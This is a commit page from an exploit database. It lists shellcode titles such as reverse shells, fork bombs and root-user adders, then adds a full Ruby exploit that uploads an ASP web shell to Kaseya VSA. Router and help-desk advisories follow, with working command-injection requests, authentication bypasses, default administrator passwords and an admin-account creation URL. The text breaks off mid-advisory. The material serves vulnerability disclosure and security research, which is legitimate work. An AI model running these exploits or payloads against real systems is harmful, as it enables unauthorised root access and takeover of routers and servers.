Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes)

Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes)
Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)
Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)
Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)
Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)
Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)
Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)
Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x86-64 - mkdir() Shellcode (25 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)
Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)
Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)
Linux/x64 - mkdir() Shellcode (25 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)

Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)

Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)
Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)
Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)
Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)
Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)
FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)
FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)
FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes)
FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
Linux/x86-64 - shutdown -h now Shellcode (65 bytes)
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)
Linux/x64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)
Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)
Linux/x64 - shutdown -h now Shellcode (65 bytes)
Linux/x64 - shutdown -h now Shellcode (64 bytes)
Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)
Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)

Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)
Windows/x64 (10) - Egghunter Shellcode (45 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2)
Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)
Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)
Windows - cmd.exe Shellcode (718 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1)

Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (24 bytes)

Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/x86-64 - Kill All Processes Shellcode (19 bytes)
Linux/x86-64 - Fork Bomb Shellcode (11 bytes)
Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)
Linux/x64 - Kill All Processes Shellcode (19 bytes)
Linux/x64 - Fork Bomb Shellcode (11 bytes)

Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)
Linux/x64 - mkdir(evil) Shellcode (30 bytes)

Windows/x86-64 - API Hooking Shellcode (117 bytes)
Windows/x64 - API Hooking Shellcode (117 bytes)
This commit is contained in:
Offensive Security 2018-01-25 18:22:06 +00:00
parent de7fa7a242
commit cf96346519
56 changed files with 2410 additions and 254 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

165
exploits/asp/webapps/43882.rb Executable file
View file

@ -0,0 +1,165 @@
#!/usr/bin/ruby
#
# kazPwn.rb - Kaseya VSA v7 to v9.1 authenticated arbitrary file upload (CVE-2015-6589 / ZDI-15-450)
# ===================
# by Pedro Ribeiro <pedrib@gmail.com> / Agile Information Security
# Disclosure date: 28/09/2015
#
# Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>
#
# execjs and mechanize gems are required to run this exploit
#
# According to Kaseya's advisory, this exploit should work for the following VSA versions:
# VSA Version 7.0.0.0 7.0.0.32
# VSA Version 8.0.0.0 8.0.0.22
# VSA Version 9.0.0.0 9.0.0.18
# VSA Version 9.1.0.0 9.1.0.8
# This exploit has been tested with v8 and v9.
#
# Check out these two companion vulnerabilities, both of which have Metasploit modules:
# - Unauthenticated remote code execution (CVE-2015-6922 / ZDI-15-449)
# - Unauthenticated remote privilege escalation (CVE-2015-6922 / ZDI-15-448)
#
# This code is released under the GNU General Public License v3
# http://www.gnu.org/licenses/gpl-3.0.html
#
require 'execjs'
require 'mechanize'
require 'open-uri'
require 'uri'
require 'openssl'
# avoid certificate errors
OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil
# Fixes a Mechanize bug, see
# http://scottwb.com/blog/2013/11/09/defeating-the-infamous-mechanize-too-many-connection-resets-bug/
class Mechanize::HTTP::Agent
MAX_RESET_RETRIES = 10
# We need to replace the core Mechanize HTTP method:
#
# Mechanize::HTTP::Agent#fetch
#
# with a wrapper that handles the infamous "too many connection resets"
# Mechanize bug that is described here:
#
# https://github.com/sparklemotion/mechanize/issues/123
#
# The wrapper shuts down the persistent HTTP connection when it fails with
# this error, and simply tries again. In practice, this only ever needs to
# be retried once, but I am going to let it retry a few times
# (MAX_RESET_RETRIES), just in case.
#
def fetch_with_retry(
uri,
method = :get,
headers = {},
params = [],
referer = current_page,
redirects = 0
)
action = "#{method.to_s.upcase} #{uri.to_s}"
retry_count = 0
begin
fetch_without_retry(uri, method, headers, params, referer, redirects)
rescue Net::HTTP::Persistent::Error => e
# Pass on any other type of error.
raise unless e.message =~ /too many connection resets/
# Pass on the error if we've tried too many times.
if retry_count >= MAX_RESET_RETRIES
puts "**** WARN: Mechanize retried connection reset #{MAX_RESET_RETRIES} times and never succeeded: #{action}"
raise
end
# Otherwise, shutdown the persistent HTTP connection and try again.
# puts "**** WARN: Mechanize retrying connection reset error: #{action}"
retry_count += 1
self.http.shutdown
retry
end
end
# Alias so #fetch actually uses our new #fetch_with_retry to wrap the
# old one aliased as #fetch_without_retry.
alias_method :fetch_without_retry, :fetch
alias_method :fetch, :fetch_with_retry
end
if ARGV.length < 4
puts 'Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>'
exit -1
end
host = ARGV[0]
username = ARGV[1]
password = ARGV[2]
shell_file = ARGV[3]
login_url = host + '/vsapres/web20/core/login.aspx'
agent = Mechanize.new
# 1- go to the login URL, get a session cookie and the challenge.
page = agent.get(login_url)
login_form = page.forms.first
challenge = login_form['loginFormControl$ChallengeValueField']
# 2- calculate the password hashes with the challenge
source = open(host + "/inc/sha256.js").read
source += open(host + "/inc/coverPass.js").read
source += open(host + "/inc/coverPass256.js").read
source += open(host + "/inc/coverData.js").read
source += open(host + "/inc/passwordHashes.js").read
source.gsub!(/\<\!--(\s)*\#include.*--\>/, "") # remove any includes, this causes execjs to fail
context = ExecJS.compile(source)
hashes = context.call("getHashes",username,password,challenge)
# 3- submit the login form, authenticate our cookie and get the ReferringWebWindowId needed to upload the file
# We need the following input values to login:
# - __EVENTTARGET (empty)
# - __EVENTARGUMENT (empty)
# - __VIEWSTATE (copied from the original GET request)
# - __VIEWSTATEENCRYPTED (copied from the original GET request; typically empty)
# - __EVENTVALIDATION (copied from the original GET request)
# - loginFormControl$UsernameTextbox (username)
# - loginFormControl$PasswordTextbox (empty)
# - loginFormControl$SubmitButton (copied from the original GET request; typically "Logon")
# - loginFormControl$SHA1Field (output from getHashes)
# - loginFormControl$RawSHA1Field (output from getHashes)
# - loginFormControl$SHA256Field (output from getHashes)
# - loginFormControl$RawSHA256Field (output from getHashes)
# - loginFormControl$ChallengeValueField (copied from the original GET request)
# - loginFormControl$TimezoneOffset ("0")
# - loginFormControl$ScreenHeight (any value between 800 - 2048)
# - loginFormControl$ScreenWidth (any value between 800 - 2048)
login_form['__EVENTTARGET'] = ''
login_form['__EVENTARGUMENT'] = ''
login_form['loginFormControl$UsernameTextbox'] = username
login_form['loginFormControl$SHA1Field'] = hashes['SHA1Hash']
login_form['loginFormControl$RawSHA1Field'] = hashes['RawSHA1Hash']
login_form['loginFormControl$SHA256Field'] = hashes['SHA256Hash']
login_form['loginFormControl$RawSHA256Field'] = hashes['RawSHA256Hash']
login_form['loginFormControl$TimezoneOffset'] = 0
login_form['loginFormControl$SubmitButton'] = 'Logon'
login_form['loginFormControl$screenHeight'] = rand(800..2048)
login_form['loginFormControl$screenWidth'] = rand(800..2048)
page = agent.submit(login_form)
web_windowId = Hash[URI::decode_www_form(page.uri.query)]['ReferringWebWindowId']
# 4- upload the file using the ReferringWebWindowId
page = agent.post('/vsapres/web20/json.ashx',
'directory' => "../WebPages",
'ReferringWebWindowId' => web_windowId,
'request' => 'uploadFile',
'impinf__uploadfilelocation' => File.open(shell_file)
)
if page.code == "200"
puts "Shell uploaded, check " + host + "/" + File.basename(shell_file)
else
puts "Error occurred, shell was not uploaded correctly..."
end

6
exploits/cgi/remote/40949.rb
View file

@ -1,12 +1,10 @@
#
# Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb
#
# Remote code execution in NETGEAR WNR2000v5
# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
# Released on 20/12/2016
#
# NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot.
# A more reliable Metasploit module will be released soon.
# NOTE: this exploit is "alpha" quality and has been deprecated. Please see the modules
# accepted into the Metasploit framework, or https://github.com/pedrib/PoC/tree/master/exploits/metasploit/wnr2000
#
#
# TODO:

157
exploits/hardware/dos/43891.txt Normal file
View file

File diff suppressed because one or more lines are too long

134
exploits/hardware/remote/43881.txt Normal file
View file

@ -0,0 +1,134 @@
>> Unauthenticated LAN remote code execution in AsusWRT
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 22/01/2018 / Last updated: 25/01/2018
>> Background and summary
AsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.
Thankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.
However due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.
A special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).
>> Technical details:
#1
Vulnerability: HTTP server authentication bypass
CVE-2018-5999
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007
The AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.
In AsusWRT_source/router/httpd/httpd.c:
handle_request(void)
{
...
handler->auth(auth_userid, auth_passwd, auth_realm);
auth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);
if (auth_result != 0) <--- auth fails
{
if(strcasecmp(method, "post") == 0){
if (handler->input) {
handler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed
}
send_login_page(fromapp, auth_result, NULL, NULL, 0);
}
//if(!fromapp) http_logout(login_ip_tmp, cookies);
return;
}
...
}
This can (and will) be combined with other vulnerabilities to achieve remote code execution.
#2
Vulnerability: Unauthorised configuration change (NVRAM value setting)
CVE-2018-6000
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007
By abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.
In AsusWRT_source/router/httpd/web.c:
do_vpnupload_post(char *url, FILE *stream, int len, char *boundary)
{
...
if (!strncasecmp(post_buf, "Content-Disposition:", 20)) {
if(strstr(post_buf, "name=\"file\""))
break;
else if(strstr(post_buf, "name=\"")) {
offset = strlen(post_buf);
fgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);
len -= strlen(post_buf) - offset;
offset = strlen(post_buf);
fgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);
len -= strlen(post_buf) - offset;
p = post_buf;
name = strstr(p, "\"") + 1;
p = strstr(name, "\"");
strcpy(p++, "\0");
value = strstr(p, "\r\n\r\n") + 4;
p = strstr(value, "\r");
strcpy(p, "\0");
//printf("%s=%s\n", name, value);
nvram_set(name, value);
}
}
...
}
These NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.
Once that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.
A more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.
The daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).
However we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.
(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).
Packet structure (from AsusWRT_source/router/shared/iboxcom.h):
- Header
typedef struct iboxPKTEx
{
BYTE ServiceID;
BYTE PacketType;
WORD OpCode;
DWORD Info; // Or Transaction ID
BYTE MacAddress[6];
BYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string
} ibox_comm_pkt_hdr_ex;
- Body
typedef struct iboxPKTCmd
{
WORD len;
BYTE cmd[420]; <--- command goes here
} PKT_SYSCMD; // total 422 bytes
A Metasploit module exploiting this vulnerability has been released [3].
>> Fix:
Upgrade to AsusWRT v3.0.0.4.384.10007 or above.
See [4] for the very few details and new firmware released by Asus.
>> References:
[1] https://blogs.securiteam.com/index.php/archives/3589
[2] https://github.com/jduck/asus-cmd
[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb
[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

180
exploits/hardware/webapps/43884.txt Normal file
View file

@ -0,0 +1,180 @@
>> Multiple vulnerabilities in TrueOnline / ZyXEL / Billion routers
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 26/12/2016 / Last updated: 18/01/2017
>> Summary:
TrueOnline is a major Internet Service Provider in Thailand which distributes various rebranded ZyXEL and Billion routers to its customers.
Three router models - ZyXEL P660HN-T1A v1, ZyXEL P660HN-T1A v2 and Billion 5200W-T - contain a number of default administrative accounts, as well as authenticated and unauthenticated command injection vulnerabilities (running as root) in their web interfaces, mostly in the syslog remote forwarding function. All the routers are still in widespread use in Thailand, with the Billion 5200W-T router currently being distributed to new customers.
These routers are based on the TC3162U SoC (or variants of it), a system-on-a-chip made by TrendChip, which was a manufacturer of SoC that was acquired by Ralink / MediaTek in 2011.
TC3162U based routers have two firmware variants.
The first variant is "ras", used on hardware versions that have 4mb or less of flash storage, which is based on the real time operating system ZynOS. It is infamous as the includes Allegro RomPager v4.07, which is vulnerable to the "misfortune cookie" attack (see [1]), and its web server is vulnerable to the "rom-0" attack (see [2]).
The other variant is "tclinux", which is a full fledged Linux used in hardware versions that have more than 4 MB of flash storage. This advisory refers to this variant, which includes the Boa web server and several ASP files with the command injection vulnerabilities. Note that tclinux might also be vulnerable to the misfortune cookie and rom-0 attacks - this was not investigated in detail by the author. For more information on tclinux see [3].
It should be noted that tclinux contains files and configuration settings in other languages (for example in Turkish). Therefore it is likely that these firmware versions are not specific to TrueOnline, and other ISP customised routers in other countries might also be vulnerable. It is also possible that other brands and router models that use the tclinux variant are also affected by the command injection vulnerabilities (while the default accounts are likely to be TrueOnline specific). Please contact pedrib@gmail.com if you find any other routers or firmware versions that have the same vulnerabilities.
These vulnerabilities were discovered in July 2016 and reported through Securiteam's Secure Disclosure program (see https://blogs.securiteam.com/index.php/archives/2910 for their advisory). SSD contacted the vendors involved, but received no reply and posted their advisory on December 26th 2016. There is currently no fix for these issues. It is unknown whether these issues are exploitable over the WAN, although this is a possibility since some of the default accounts appear to have been deployed for ISP use.
Three Metasploit modules that abuse these vulnerabilities have been released (see [4], [5] and [6]).
>> Update (18/01/2017):
ZyXEL have responded to this advisory and published information about upcoming fixes for the 660HN v1 and v2 in http://www.zyxel.com/support/announcement_unauthenticated.shtml
>> Technical details:
#1
Vulnerability: Unauthenticated command injection (ZyXEL P660HN-T1A v1)
NO-CVE - use FD:2017/Jan/40-1 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker in the LAN. See below for other constraints.
Affected versions:
- ZyXEL P660HN-T1A, hardware revision v1, TrueOnline firmware version 340ULM0b31, other firmware versions might be affected
This router has a command injection vulnerability in the Maintenance > Logs > System Log > Remote System Log forwarding function.
The vulnerability is in the ViewLog.asp page, which is accessible unauthenticated. The following request will cause the router to issue 3 ping requests to 10.0.99.102:
POST /cgi-bin/ViewLog.asp HTTP/1.1
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save
The command in injection is in the remote_host parameter.
This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root.
#2
Vulnerability: Authenticated command injection (ZyXEL P660HN-T1A v2)
NO-CVE - use FD:2017/Jan/40-2 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: Can be exploited by an authenticated attacker in the LAN. See below for other constraints.
Affected versions:
- ZyXEL P660HN-T1A, hardware revision v2, TrueOnline firmware version 200AAJS3D0, other firmware versions might be affected
Unlike in the P660HN-Tv1, the injection is authenticated and in the logSet.asp page. However, this router contains several default administrative accounts (see below) that can be used to exploit this vulnerability.
The injection is in the logSet.asp page that sets up remote forwarding of syslog logs, and the parameter vulnerable to command injection is the serverIP parameter.
The following request will cause the router to issue 3 ping requests to 1.1.1.1:
POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1
logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514
This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root.
It is known that this injection ends up in /etc/syslog.conf as
ServerIP="192.168.1.1 `ping -c 3 1.1.1.1`&#"
Which will then be executed by a background process almost immediately.
The actual injection is limited to 28 characters. This can circunvented by writing a shell script file in the /tmp directory 28 characters at a time, and the executing that file.
#3
Vulnerability: Unauthenticated command injection (Billion 5200W-T)
NO-CVE - use FD:2017/Jan/40-3 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker in the LAN. See below for other constraints.
Affected versions:
- Billion 5200W-T, TrueOnline firmware version 1.02b.rc5.dt49, other firmware versions might be affected
The Billion 5200W-T router contains an unauthenticated command injection in adv_remotelog.asp page, which is used to set up remote syslog forwarding.
The following request will cause the router to issue 3 ping requests to 192.168.1.35:
POST /cgi-bin/adv_remotelog.asp HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514
The injection is on the syslogServerAddr parameter and can be exploited by entering a valid IP address, followed by ";<COMMAND>;"
This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root.
#4
Vulnerability: Authenticated command injection (Billion 5200W-T)
NO-CVE - use FD:2017/Jan/40-4 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: Can be exploited by an authenticated attacker in the LAN. See below for other constraints.
Affected versions:
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008 130603, other firmware versions might be affected
The Billion 5200W-T router also has several other command injections in its interface, depending on the firmware version, such as an authenticated command injection in tools_time.asp (uiViewSNTPServer parameter).
It should be noted that this router contains several default administrative accounts that can be used to exploit this vulnerability.
This injection can be exploited with the following request:
POST /cgi-bin/tools_time.asp HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Cookie: SESSIONID=7c082c75
SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+192.168.0.1+%26%23&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA
This writes the command to a file /etc/ntp.sh:
/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 192.168.0.1 &#" &
which is then executed almost immediately.
This vulnerability was found during a black box assessment of the web interface, so the injection path was not fully investigated. All commands run as root.
#5
Vulnerability: Default administrative credentials (ZyXEL P660HN-T1A v1)
NO-CVE - use FD:2017/Jan/40-5 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: N/A
Affected versions:
- ZyXEL P660HN-T1A, hardware revision v1, TrueOnline firmware version 340ULM0b31, other firmware versions might be affected
This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true
#6
Vulnerability: Default administrative credentials (ZyXEL P660HN-T1A v2)
NO-CVE - use FD:2017/Jan/40-6 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: N/A
Affected versions:
- ZyXEL P660HN-T1A, hardware revision v2, TrueOnline firmware version 200AAJS3D0, other firmware versions might be affected
This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true
username: supervisor; password: zyad1234
#7
Vulnerability: Default administrative credentials (Billion 5200W-T)
NO-CVE - use FD:2017/Jan/40-7 (Full Disclosure) or SSD-2910 (SecuriTeam blog)
Attack Vector: Remote
Constraints: N/A
Affected versions:
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008 130603, other firmware versions might be affected
This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true
username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
>> Fix:
There is NO FIX for this vulnerability. Do not allow untrusted clients to connect to these routers. Timeline of disclosure:
July 2016: Vulnerability reported to Securiteam Secure Disclosure
Securiteam contacted the affected versions. No response.
26.12.2016: Vulnerability information published in the SSD blog (https://blogs.securiteam.com/index.php/archives/2910 for their advisory).
12.01.2017: Vulnerability information published in https://github.com/pedrib/PoC
18.01.2017: ZyXEL have responded to this advisory and published information about upcoming fixes for the 660HN v1 and v2 in http://www.zyxel.com/support/announcement_unauthenticated.shtml
>> References:
[1] http://www.kb.cert.org/vuls/id/561444
[2] https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/
[3] https://vasvir.wordpress.com/tag/trendchip-firmware/
[4] https://github.com/rapid7/metasploit-framework/pull/7820
[5] https://github.com/rapid7/metasploit-framework/pull/7821
[6] https://github.com/rapid7/metasploit-framework/pull/7822
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

232
exploits/hardware/webapps/43885.txt Normal file
View file

@ -0,0 +1,232 @@
>> Multiple vulnerabilities in SysAid Help Desk 14.4
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 03/06/2015 / Last updated: 10/06/2015
>> Background on the affected product:
"SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance."
Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon.
All vulnerabilities affect both the Windows and Linux versions unless otherwise noted.
>> Technical details:
1)
Vulnerability: Administrator account creation
CVE-2015-2993 (same CVE as #10)
Constraints: none; no authentication or any other information needed
Affected versions: unknown, at least 14.4
GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123
This creates an account with the following credentials: mr_lit:secret
Note that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted.
2)
